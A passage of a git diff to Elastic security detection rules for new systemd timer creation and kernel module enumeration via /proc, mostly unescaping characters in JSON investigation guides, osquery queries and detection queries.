machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : (\"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\")\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json index cd91682e64e..5b75f815f85 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_6.json @@ -18,7 +18,7 @@ "file.path", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : (\n \"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\" or \"cloudflared\"\n)\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json index f73fb78a921..ae5b3cf6750 100644 --- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_7.json @@ -18,7 +18,7 @@ "file.path", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : (\n \"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\" or \"cloudflared\"\n)\n", "references": [ "https://opensource.com/article/20/7/systemd-timers", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json index 30ced422f23..49cb007e351 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_1.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Kernel Modules via Proc", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and \nfile.path == \"/proc/modules\" and not process.parent.pid == 1\n", "required_fields": [ { @@ -41,7 +41,7 @@ ], "risk_score": 47, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, 